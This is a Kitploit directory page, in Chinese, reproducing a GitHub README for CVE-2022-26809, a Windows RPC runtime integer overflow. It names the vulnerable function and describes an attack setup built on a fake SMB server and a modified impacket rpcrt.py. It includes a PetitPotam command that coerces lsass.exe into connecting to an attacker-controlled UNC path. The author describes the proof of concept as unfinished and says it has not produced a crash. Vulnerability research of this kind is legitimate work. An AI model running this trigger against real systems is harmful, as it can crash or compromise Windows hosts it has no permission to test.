Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-26809 — CVE-2022-26809 的概念验证及分析,这是一个 Windows RPC 运行时整数溢出漏洞。包含利用 PetitPotam 风格 UNC 路径中继通过 ESFRPC 请求攻击 lsass.exe 的触发脚本。 | Kitploit
工具/GitHubGitHub/yuanlink/cve-2022-26809
漏洞分析漏洞利用渗透测试Payload 开发二进制利用
GitHubyuanlink/cve-2022-26809

CVE-2022-26809

CVE-2022-26809 的概念验证及分析,这是一个 Windows RPC 运行时整数溢出漏洞。包含利用 PetitPotam 风格 UNC 路径中继通过 ESFRPC 请求攻击 lsass.exe 的触发脚本。

查看仓库
61274年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-26809

此仓库仅针对该 CVE 进行简单研究,更详细的分析请参考此处。
更新:2022/05/19
此分析尚未完成....

更新:2022/05/22
HuanGMz 的文章 和 corelight 博客 展示了真正的漏洞点:

OSF_CASSOCIATION::ProcessBindAckOrNak

此漏洞的触发方式与 CVE-2021-43893 类似——当向 lsass.exe 发送 ESFRPC 请求并携带 UNC 路径时,受害方将尝试作为客户端访问目标,从而在客户端 API 中触发整数溢出。

如果有更好的触发此漏洞的方法,欢迎提交 issue 或 pr :)

PoC-CVE-2022-26809

参考此处

由于该漏洞的触发方式与 CVE-2021-43893 相似,直接克隆 PetitPotam 代码即可。

只需准备类似以下的环境:

  • 触发端:使用 PetitPotam
  • 受害者:存在漏洞的 rpcrt4.dll
  • 攻击者:攻击者服务器
  1. 在攻击者服务器上运行 fake_smb_server.py,但需将 rpcrt.py 替换为修改版(因为 Windows 系统上 445 端口已被占用,建议在 Linux 上部署服务)
  2. 触发受害者访问攻击者服务器:
root@kitploit:~
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile"
  1. 通常不会立即导致蓝屏死机,可为 lsass.exe 启用页堆(不过本人尚未成功触发蓝屏,但根据 windbg 分析,整数溢出已被触发)

旧描述
以下是 Windows RPC 漏洞 CVE-2022-26809 的复现代码,参考自 https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello。

PoC-OSF_SCALL::GetCoalescedBuffer

我的 Python 版本为 3.6.7 不确定 GetCoalescedBuffer 是否涉及真实的 CVE-2022-26809,暂时保留 poc.py 只是尝试触发漏洞函数 OSF_SCALL::GetCoalescedBuffer,不会导致任何崩溃,因为 DWORD 整数溢出极难复现。而 rpcrt.py 是 Python 包 impacket.dcerpc.v5.rpcrt 的内容,替换原始文件即可触发漏洞(请记得备份原始文件 :) 我认为 rpcrt.py 存在大量 bug)。

如果无效,也许 wireshark 可以帮助定位问题。

PipeDemo

如有必要,可使用 nmake 重新构建。

下载工具